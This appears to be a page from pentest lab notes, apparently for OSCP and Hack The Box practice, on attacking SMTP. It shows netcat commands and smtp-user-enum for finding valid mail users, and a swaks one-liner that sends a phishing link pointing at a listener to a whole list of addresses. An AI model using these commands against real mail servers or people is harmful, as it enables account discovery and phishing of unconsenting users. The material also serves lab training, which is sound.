SMTP

SMTP is a mail protocol, which is used to enumerate users and send phising maills to the existing user

User Enumeration

Manual

nc 10.10.10.10 25
<banner> # check for vulnerability with banner 
HELO # start the connection
ELHO all
VRFY root # verify root user
mail from: dn@oscp # attacker mail
rcpt to: root@localhost # verify user with recipient

Automated

Tool : smtp-user-enum

 smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t $ip

Phishing Mails

Send automated phising links to a bunch of users
PREREQUISITE: Users emails

# listen on the port 
nc -lvnp 1234

# send mail to all the users with swaks
swaks --to $(cat files/mailuers.txt | tr '\n' ',' | less) --from dnoscp@oscp.htb --header "Subject: test" --body "please click here http://10.10.14.2:1234/" --server $ip

Machines

Reel - https://0xdf.gitlab.io/2018/11/10/htb-reel.html#smtp-enumeration

PreviousFTP NextDNS

Last updated 3 years ago

Was this helpful?